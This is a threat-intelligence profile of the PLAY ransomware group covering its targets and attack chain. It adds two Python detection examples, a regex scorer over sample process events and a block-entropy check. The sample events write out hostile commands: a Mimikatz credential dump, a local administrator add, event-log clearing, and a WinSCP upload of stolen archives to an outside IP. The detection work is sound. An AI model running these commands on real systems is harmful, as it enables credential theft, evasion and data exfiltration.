PLAY
With its recent shift to a Ransomware-as-a-Service (RaaS) model, PLAY – also known as PlayCrypt – is now targeting Managed Service Providers (MSPs) worldwide, and has affected more than 300 entities.

The Origin of PLAY
The PLAY ransomware group, suspected of Russian ties because its encryption techniques resemble those of Russian-affiliated cybercrime outfits, surfaced in 2022 and appends a distinctive '.play' extension to the files it encrypts.
PLAY shares tooling with Hive and Nokoyawa. A notable commonality is their use of AdFind, a command-line utility for querying Active Directory, which points to similar operational behaviour across the three groups.

Countries targeted by PLAY
Initially focused on Germany and the rest of Europe, the group has since extended its reach to targets across the United States, Brazil, Argentina, Mexico and Australia.

Industries Targeted by PLAY
PLAY’s activities predominantly revolve around the telecommunications and healthcare industries, though it has not spared organizations within the Media/Communication, Transportation, Construction, and Government sectors.
Source: Trend Micro
PLAY's Victims
To date, more than 814 victims have fallen prey to its malicious operations.

PLAY’s Attack Method

PLAY obtains initial access through valid accounts and by exploiting vulnerabilities in public-facing FortiOS and Microsoft Exchange servers.

PLAY escalates privileges using tools such as Mimikatz and by adding compromised users to administrator groups.

PLAY evades defenses by disabling antivirus programs, clearing event logs, and using intermittent encryption, which encrypts only portions of each file so that encryption finishes faster and whole-file entropy checks are less likely to fire.

PLAY dumps credentials with Mimikatz, typically executed as a module of Cobalt Strike or Empire.

PLAY queries Active Directory with AdFind and BloodHound, and enumerates the network with Grixba.

PLAY moves laterally with Cobalt Strike and SystemBC, and executes files across the domain through Group Policy Objects.


PLAY relies on Empire, SystemBC, Cobalt Strike, PsExec, and batch files for execution.

For exfiltration and encryption, PLAY splits data into segmented WinRAR archives, transfers them with WinSCP, and then encrypts files with a hybrid AES-RSA scheme (file contents encrypted with AES, the AES keys wrapped with an RSA public key), appending the '.play' extension.

Using double-extortion tactics, PLAY demands a cryptocurrency ransom and threatens to leak the stolen data if it is not paid.
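The chain above is the detection opportunity: each tool on its own is common in an enterprise, but several of these phases on one host within a few hours is not. The following is an added example (not code from the original page or from any vendor): a Python scorer that turns the TTP list into regex rules and runs them over Sysmon-style process-creation events. The event records, field names, regexes and six-hour window are assumptions for illustration; the patterns are a starting point to tune, not signatures to deploy as-is.

```python
"""Score process-creation telemetry against the PLAY tool chain described above.

Added example: the events are constructed Sysmon-style records (not real
telemetry), and the regexes are assumptions based on the tools named on this
page, not vendor or PLAY-specific signatures. Tune them before deploying."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# (rule name, attack phase as described on this page, pattern over "<image> <command line>")
RULES = [
    ("adfind_ad_query", "discovery",
     re.compile(r"adfind\.exe.*\s-f\s+\W*objectcategory", re.I)),
    ("bloodhound", "discovery",
     re.compile(r"sharphound|bloodhound", re.I)),
    ("mimikatz", "credential_access",
     re.compile(r"sekurlsa::|lsadump::|privilege::debug", re.I)),
    ("admin_group_add", "privilege_escalation",
     re.compile(r"\bnet1?(\.exe)?\s+localgroup\s+administrators\s+\S+\s+/add", re.I)),
    ("event_log_clear", "defense_evasion",
     re.compile(r"wevtutil(\.exe)?\s+cl\b", re.I)),
    ("psexec", "lateral_movement",
     re.compile(r"psexec(64)?\.exe|psexesvc\.exe", re.I)),
    ("winrar_split_archive", "collection",
     re.compile(r"(winrar|rar)\.exe\s+a\b.*\s-v\d+[kmg]?\b", re.I)),
    ("winscp_transfer", "exfiltration",
     re.compile(r"winscp(\.com|\.exe)?\s.*(/command|\bput\s)", re.I)),
]

# Constructed sample events (UTC timestamps). FS01 carries the chain; WS22 is benign noise.
EVENTS = [
    {"ts": "2024-03-01T01:58:10Z", "host": "FS01", "user": "CORP\\svc_backup",
     "image": r"C:\Windows\System32\wevtutil.exe", "cmdline": "wevtutil qe Security /c:5"},
    {"ts": "2024-03-01T02:11:04Z", "host": "FS01", "user": "CORP\\svc_backup",
     "image": r"C:\Windows\Temp\adfind.exe",
     "cmdline": r'adfind.exe -f "(objectcategory=computer)" -csv > C:\Windows\Temp\comps.csv'},
    {"ts": "2024-03-01T02:14:31Z", "host": "FS01", "user": "CORP\\svc_backup",
     "image": r"C:\Windows\Temp\mm.exe",
     "cmdline": 'mm.exe "privilege::debug" "sekurlsa::logonpasswords" exit'},
    {"ts": "2024-03-01T02:20:45Z", "host": "FS01", "user": "CORP\\svc_backup",
     "image": r"C:\Windows\System32\net.exe",
     "cmdline": "net localgroup administrators CORP\\svc_backup /add"},
    {"ts": "2024-03-01T03:02:17Z", "host": "FS01", "user": "CORP\\svc_backup",
     "image": r"C:\Program Files\WinRAR\WinRAR.exe",
     "cmdline": r'WinRAR.exe a -v500m -ep1 C:\Windows\Temp\hr.rar "\\FS01\HR\*"'},
    {"ts": "2024-03-01T03:40:02Z", "host": "FS01", "user": "CORP\\svc_backup",
     "image": r"C:\Windows\Temp\winscp.com",
     "cmdline": r'winscp.com /command "open sftp://u:p@203.0.113.10" "put C:\Windows\Temp\hr.part*.rar /in/" "exit"'},
    {"ts": "2024-03-01T04:05:55Z", "host": "FS01", "user": "CORP\\svc_backup",
     "image": r"C:\Windows\System32\wevtutil.exe", "cmdline": "wevtutil cl Security"},
    {"ts": "2024-03-01T09:15:00Z", "host": "WS22", "user": "CORP\\jdoe",
     "image": r"C:\Program Files\WinRAR\WinRAR.exe",
     "cmdline": r"WinRAR.exe a C:\Users\jdoe\Documents\report.rar C:\Users\jdoe\Documents\q1"},
]


def match_rules(event):
    """Return (rule, phase) pairs whose pattern hits this single event."""
    text = f"{event['image']} {event['cmdline']}"
    return [(name, phase) for name, phase, rx in RULES if rx.search(text)]


def score_chain(events, window=timedelta(hours=6), min_phases=3):
    """Flag a host when at least `min_phases` distinct phases occur within `window`.

    Individual hits are noisy; the combination of discovery, credential access,
    collection and exfiltration on one host in a few hours is the real signal."""
    hits = defaultdict(list)
    for ev in events:
        ts = datetime.strptime(ev["ts"], "%Y-%m-%dT%H:%M:%SZ")
        for name, phase in match_rules(ev):
            hits[ev["host"]].append((ts, phase, name))
    flagged = {}
    for host, host_hits in hits.items():
        host_hits.sort()
        for i, (t0, _, _) in enumerate(host_hits):
            in_window = [h for h in host_hits[i:] if h[0] - t0 <= window]
            phases = {p for _, p, _ in in_window}
            if len(phases) >= min_phases:
                flagged[host] = {"phases": sorted(phases), "rules": [n for _, _, n in in_window]}
                break
    return flagged


if __name__ == "__main__":
    for host, detail in score_chain(EVENTS).items():
        print(host, detail["phases"], detail["rules"])
```

The benign events (a `wevtutil qe` query and a WinRAR archive without the `-v` split switch) produce no hits, while FS01 accumulates six phases inside the window. In production the same logic would key on the host and the account, and the windowing would run over a stream rather than a list.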

TTPs used by PLAY
How to Detect PLAY with Vectra AI
The Vectra AI Platform provides a list of detections that would indicate a ransomware attack of this kind.
FAQs
What is the PLAY Ransomware Group?
The PLAY Ransomware Group is a cybercriminal organization known for deploying ransomware to encrypt victims' files, demanding ransom payments for decryption keys. They often target organizations with weak security postures.
How does PLAY ransomware infect systems?
PLAY typically gains access through compromised valid accounts and by exploiting vulnerabilities in exposed FortiOS and Microsoft Exchange servers; phishing emails and exploit kits are also reported as delivery vectors. Once inside, the operators escalate privileges and stage the ransomware payload across the network.
What sectors are most at risk from PLAY ransomware attacks?
While PLAY ransomware has targeted a broad range of sectors, critical infrastructure, healthcare, and financial services have been particularly vulnerable due to the sensitive nature of their data.
What are the indicators of compromise (IoCs) associated with PLAY ransomware?
IoCs for PLAY ransomware include the '.play' extension appended to encrypted files and the ransom notes dropped alongside them, the presence of the tooling described above (AdFind, BloodHound, Grixba, Mimikatz, Cobalt Strike, SystemBC, PsExec), split WinRAR archives staged for exfiltration, unusual outbound transfers via WinSCP, and suspicious registry key modifications.
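One file-level check ties the '.play' extension indicator in this answer to the intermittent encryption noted in the attack method section: a whole-file entropy threshold misses a file in which only some blocks are encrypted, but a block-wise ratio still catches it. The code below is an added example, not the page's own code and not PLAY's; the three sample files are constructed in memory, seeded random bytes stand in for ciphertext, and the 4 KiB block size, the 7.5-bit threshold and the 10% block ratio are assumed starting points.

```python
"""Block-wise entropy check that catches intermittently encrypted files.

Added example, not the page's or PLAY's code. Sample files are built in memory;
seeded random bytes stand in for ciphertext. Block size, the 7.5-bit block
threshold and the 10% block ratio are assumed starting points, not tuned values."""
import math
import random
from collections import Counter

BLOCK = 4096           # assumed scan granularity in bytes
BLOCK_THRESHOLD = 7.5  # bits/byte; random data sits near 8.0, English text near 4.0-5.0
RATIO_ALERT = 0.10     # fraction of high-entropy blocks that raises the block alert


def shannon_entropy(data: bytes) -> float:
    """Bits per byte over the given buffer (0.0 for empty input)."""
    n = len(data)
    if n == 0:
        return 0.0
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def encrypted_block_ratio(data: bytes, block: int = BLOCK,
                          threshold: float = BLOCK_THRESHOLD) -> float:
    """Fraction of fixed-size blocks whose entropy is at or above the threshold."""
    blocks = [data[i:i + block] for i in range(0, len(data), block)]
    if not blocks:
        return 0.0
    hot = sum(1 for b in blocks if shannon_entropy(b) >= threshold)
    return hot / len(blocks)


def assess(name: str, data: bytes) -> dict:
    """Combine the extension indicator with whole-file and block-wise entropy."""
    whole = shannon_entropy(data)
    ratio = encrypted_block_ratio(data)
    return {
        "name": name,
        "play_extension": name.lower().endswith(".play"),
        "whole_file_entropy": round(whole, 2),
        "high_entropy_block_ratio": ratio,
        "whole_file_alert": whole >= BLOCK_THRESHOLD,
        "block_alert": ratio >= RATIO_ALERT,
    }


def build_samples(block: int = BLOCK, blocks: int = 64) -> dict:
    """Three constructed files: plaintext, fully encrypted, and one in which only
    every 8th block (12.5%) is encrypted, mimicking intermittent encryption."""
    text = (b"quarterly revenue report, region north, figures in thousands\n" * 100)[:block]
    rng = random.Random(7)  # seeded so the results are reproducible
    plain = text * blocks
    full = rng.randbytes(block * blocks)
    partial = b"".join(rng.randbytes(block) if i % 8 == 0 else text for i in range(blocks))
    return {"report.docx": plain, "report.docx.play": full, "ledger.xlsx.play": partial}


if __name__ == "__main__":
    for fname, content in build_samples().items():
        print(assess(fname, content))
```

The partially encrypted sample has a whole-file entropy well under the threshold and would pass a naive check, yet 12.5% of its blocks are indistinguishable from ciphertext, which is what the block ratio reports. In a real scan the extension and the ratio should be treated as independent indicators, since the extension is trivially changed and the ratio alone also fires on legitimately compressed or encrypted files.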
How can SOC teams detect and respond to PLAY ransomware?
SOC teams should employ advanced threat detection solutions, conduct regular network traffic analysis, and implement threat detection and response systems. Immediate isolation of infected systems and execution of a response plan are crucial.
What are the best practices for preventing PLAY ransomware infections?
Best practices include regular software updates, employee cybersecurity awareness training, robust email filtering, and the use of multi-factor authentication (MFA) to protect against phishing and credential compromise.
Can data encrypted by PLAY ransomware be decrypted without paying the ransom?
PLAY uses hybrid AES-RSA encryption, so files cannot be recovered without the operators' private RSA key, and a reliable public decryptor may not be available. Restoring from offline backups and consulting incident-response specialists is advised before considering a ransom payment.
How does the PLAY ransomware group operate financially?
The PLAY group operates on a ransom model, demanding payments often in cryptocurrencies. They may also engage in double extortion tactics, threatening to leak stolen data if the ransom is not paid.
What should be included in a response plan for a PLAY ransomware attack?
A response plan should include immediate isolation of affected systems, identification of the ransomware strain, communication protocols, data recovery procedures from backups, and legal considerations for ransom payments.
How can organizations collaborate with law enforcement following a PLAY ransomware attack?
Organizations should report the incident to local or national cybersecurity authorities, providing detailed information about the attack without compromising ongoing operations or data privacy laws.